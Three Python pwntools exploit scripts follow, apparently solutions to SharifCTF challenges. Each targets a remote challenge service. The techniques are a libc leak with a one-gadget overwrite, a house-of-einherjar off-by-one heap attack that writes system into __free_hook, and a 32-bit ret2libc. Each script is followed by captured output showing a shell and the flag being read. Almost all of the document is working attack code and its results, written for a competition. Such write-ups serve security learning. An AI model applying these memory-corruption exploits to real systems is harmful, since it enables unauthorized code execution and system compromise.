from pwn import * | |
'''
Have you ever played with this *special* seq holder in Python?
nc ctf.sharif.edu 22106
Alternative: nc 213.233.161.38 22106
'''
# Set to True to drive a local copy of the challenge script instead of the remote service.
local = False
# Single connection object shared by every helper below.
r = process("./server.py") if local else remote("213.233.161.38", 22106)
def menu():
    """Drain the service's menu text, stopping after the "Exit" entry."""
    marker = "Exit"
    r.recvuntil(marker)
def create_db(id, tag, l):
    """Select menu item 1 and send the id, tag and length fields, one per line.

    No prompts are consumed between the fields; the caller drains output via menu().
    """
    for field in ("1", str(id), tag, str(l)):
        r.sendline(field)
def edit_db(tag, seq=None):
    """Select menu item 2, choose the "tag" field (option 1) and send *tag*.

    ``seq`` is accepted for call-site compatibility but is never sent.
    """
    r.sendline("2")
    r.recvuntil("[2] seq")
    for line in ("1", tag):
        r.sendline(line)
def print_db(tag=True):
    """Select menu item 3 and return the raw bytes printed for the tag or seq field.

    The service's reply is read up to the next "1." menu entry; the trailing
    three bytes (the "1." entry and the preceding newline) are stripped.
    """
    r.sendline("3")
    r.recvuntil("[2] seq")
    choice, label = ("1", "tag: ") if tag else ("2", "seq: ")
    r.sendline(choice)
    r.recvuntil(label)
    reply = r.recvuntil("1.")
    return reply[:-3]
# Entry 0 is created with an empty tag and a length of 20; the menu is then drained.
create_db(0, "", 20)
menu()
# The "seq" field is read back and its first 8 bytes decoded as a little-endian pointer.
leak_s = print_db(tag=False)
libc_leak = u64(leak_s.ljust(8, "\x00"))
info("libc_leak: %s" % hex(libc_leak))
# Distance between the leaked pointer and the libc load address, taken from one
# observed run on the challenge host; it is specific to that libc build.
libc_offset = 0x7fa3043f7b88-0x00007fa304033000
libc_base = libc_leak - libc_offset
info("libc_base: %s" % hex(libc_base))
menu()
# Both constants are hard-coded for the challenge environment: a fixed address
# (presumably writable, per its name; not verifiable here) and an offset into libc.
writable_addr = 0x921010
one_shot_shell = libc_base + 0x4526a
edit_db("A"*8 + p64(0)+ p64(0) + p64(writable_addr) + p64(20) + p64(one_shot_shell) + p64(0)) # overflow and overwrite db method
menu()
# Menu item 5, then hand the session to the user.
r.sendline("5")
r.interactive()
'''
[+] Opening connection to 213.233.161.38 on port 22106: Done
[*] libc_leak: 0x7f534050bb88
[*] libc_base: 0x7f5340147000
[*] Switching to interactive mode
Enter selected menu> $ id
uid=1001(suctf) gid=1001(suctf) groups=1001(suctf)
$ cat /home/suctf/flag
SharifCTF{0N3_M0R3_5T3P_70_**J1T**_H34V3N}
'''
from pwn import * | |
'''
Someone has designed this top secret management service for us. He was insisting on the term `t00p`. Could you please take a look and find out why?
nc ctf.sharif.edu 22107
Alternative: nc 213.233.161.38 22107
'''
# Set to True to drive a local copy of the challenge binary instead of the remote service.
local = False
# Key the service asks for on connect (presumably handed out with the challenge).
master_key = "wjigaep;r[jg]ahrg[es9hrg"
# Single connection object shared by every helper below.
r = process("./t00p_secrets") if local else remote("213.233.161.38", 22107)
# Answer the initial key prompt before any menu interaction.
r.recvuntil("Enter your master key: ")
r.sendline(master_key)
def menu():
    """Read and return everything up to the next "> " prompt."""
    prompt = "> "
    return r.recvuntil(prompt)
def create(idx, size, content, binary=True):
    """Menu item 1: create secret *idx* with a body of *size* bytes.

    ``binary`` selects the service's Binary(0)/String(1) mode. *content* is
    sent with send(), i.e. without a trailing newline.
    """
    r.sendline("1")
    r.recvuntil("Enter secret idx: ")
    r.sendline(str(idx))
    r.recvuntil("Enter secret body size: ")
    r.sendline(str(size))
    r.recvuntil("String(1): ")
    r.sendline("0" if binary else "1")
    r.recvuntil("):")
    r.send(content)
def edit(idx, content, binary=True):
    """Menu item 3: replace the body of secret *idx* with *content*.

    ``binary`` selects the service's Binary(0)/String(1) mode. *content* is
    sent with send(), i.e. without a trailing newline.
    """
    r.sendline("3")
    r.recvuntil("Please enter secret id to edit: ")
    r.sendline(str(idx))
    r.recvuntil("String(1): ")
    r.sendline("0" if binary else "1")
    r.recvuntil("content: ")
    r.send(content)
def delete(idx):
    """Menu item 2: delete secret *idx*."""
    r.sendline("2")
    r.recvuntil("to delete: ")
    r.sendline(str(idx))
def print_secret(idx):
    """Menu item 5: return the text after "content: " for secret *idx*.

    Returns "" when the service answers "No such secret!". The reply is read
    up to the next "1." menu entry, with the trailing three bytes stripped.
    """
    r.sendline("5")
    r.recvuntil("Please enter secret id to print: ")
    r.sendline(str(idx))
    reply = r.recvuntil("1.")[:-3]
    if "No such secret!" in reply:
        return ""
    start = reply.find("content: ") + len("content: ")
    end = reply.find("\n", start)
    return reply[start:end]
def change_master(master_key):
    """Menu item 7: answer both "Enter your master key: " prompts with *master_key*.

    The value is sent with send(), i.e. without a trailing newline.
    """
    r.sendline("7")
    for _ in range(2):
        r.recvuntil("Enter your master key: ")
        r.send(master_key)
menu()
# leak libc address:
# Three 128-byte secrets are created, the middle one deleted and re-created with an
# 8-byte body; bytes 8..16 of what prints back are decoded as a little-endian pointer.
create(0, 128, "A"*4)
menu()
create(1, 128, "B"*4)
menu()
create(2, 128, "C"*4)
menu()
delete(1)
menu()
create(1, 128, "A"*8)
menu()
s = print_secret(1)
libc_address = u64(s[8:16])
info("libc leak: %s" % hex(libc_address))
# Distance of the leaked pointer from the libc base, hard-coded for the libc build
# on the challenge host (as are free_hook and system further down); not portable.
libc_offset = 0x3c4b78
libc_base = libc_address-libc_offset
info("libc base: %s" % hex(libc_base))
# clean up
delete(0)
menu()
delete(1)
menu()
delete(2)
menu()
# heap leak
# Same create/delete/re-create pattern with 16-byte secrets; secret 0 is re-created
# with a single byte and the first 8 bytes printed back are decoded as a pointer.
create(0, 16, "A"*4)
menu()
create(1, 16, "B"*4)
menu()
create(2, 16, "C"*4)
menu()
delete(1)
menu()
delete(0)
menu()
create(0, 8, "\x30")
menu()
s = print_secret(0)
heap_address = u64(s[0:8].ljust(8, "\x00"))
info("heap leak: %s" % hex(heap_address))
# 0x30 is the observed distance from the leaked pointer back to the heap start.
heap_base = heap_address-0x30
info("heap_base: %s" % hex(heap_base))
# clean up
delete(2)
menu()
delete(0)
menu()
# house of einherjar
create(7, 0x100, "e") # size
menu()
create(4, 40, "a"*10) 
menu()
create(5, 0xf8, "b"*10)
menu()
edit(4, "a"*40, False) # OBO
menu()
# Fixed address inside the challenge binary (build-specific). The value written
# below is the distance from heap_base + 0x1b0 to that address.
target = 0x602098
evil_prev_size = (heap_base + 0x1b0)-(target)
info("prev_size: %s" % hex(evil_prev_size))
edit(4, "a"*0x20 + p64(evil_prev_size), True)
menu()
new_master = p64(evil_prev_size) + p64(target) + p64(target)
change_master(new_master)
delete(5)
menu()
# Both offsets are relative to the libc base computed above and are specific to
# the challenge host's libc build.
free_hook = libc_base + 0x3c67a8
system = libc_base + 0x45390
info("free_hook: %s" % hex(free_hook))
info("system: %s" % hex(system))
# write system to free_hook
create(5, 512, "/bin/sh\x00".ljust((8*6), "\x00") + p64(free_hook))
menu()
edit(4, p64(system))
menu()
delete(5)
r.interactive()
'''
[+] Opening connection to 213.233.161.38 on port 22107: Done
[*] libc leak: 0x7f7d4e8fcb78
[*] libc base: 0x7f7d4e538000
[*] heap leak: 0x237d030
[*] heap_base: 0x237d000
[*] prev_size: 0x1d7b118
[*] free_hook: 0x7f7d4e8fe7a8
[*] system: 0x7f7d4e57d390
[*] Switching to interactive mode
$ id
uid=1001(suctf) gid=1001(suctf) groups=1001(suctf)
$ cat /home/suctf/flag
SharifCTF{R34V1L1NG_S3CR3T5_VI4_51NGL3_NULL_BY73}
'''
from pwn import * | |
'''
It all started with a leak bang
nc ctf.sharif.edu 4801
Alternative: nc 213.233.161.38 4801
'''
# Set to True to drive a local copy of the challenge binary instead of the remote service.
local = False
# Single connection object used by the rest of the script.
r = process("./vuln4") if local else remote("213.233.161.38", 4801)
# leak puts address
# Addresses of the binary's puts GOT entry, puts PLT stub and main, hard-coded
# for this particular (32-bit) build of the challenge binary.
puts_got = 0x8049874
puts_plt = 0x80483A0
main = 0x80484EA
r.recvuntil("yourself\n")
# 22 bytes of filler, then three 32-bit values (presumably the saved return
# address and what follows it on the stack for this binary; not verifiable here).
payload = "A"*22 + p32(puts_plt) + p32(main) + p32(puts_got) # return to main
r.sendline(payload)
# The first 4 bytes printed back before "This" are decoded as the resolved puts address.
s = r.recvuntil("This")[:-5]
puts_libc = u32(s[0:4])
info("puts_libc = %s" % hex(puts_libc))
r.recvuntil("yourself\n")
# system("/bin/sh")
# Offsets relative to puts, derived from addresses observed in one run on a
# specific libc build; they will not hold on a different libc.
system_offset = 0x565b4ca0-0x5658fda0
bin_sh_offset = 0x566b0a0b-0x565b4ca0
system_libc = puts_libc - system_offset
bin_sh = puts_libc + bin_sh_offset
info("system_libc = %s" % hex(system_libc))
info("bin_sh = %s" % hex(bin_sh))
payload = "A"*22 + p32(system_libc) + p32(main) + p32(bin_sh)
r.sendline(payload)
r.interactive()
'''
[*] puts_libc = 0xb75cbca0
[*] system_libc = 0xb75a6da0
[*] bin_sh = 0xb76c7a0b
[*] Switching to interactive mode
$ id
uid=1002(ctfuser) gid=1002(ctfuser) groups=1002(ctfuser)
$ cat /home/ctfuser/flag
SharifCTF{7af9dab81dff481772609b97492d6899}
'''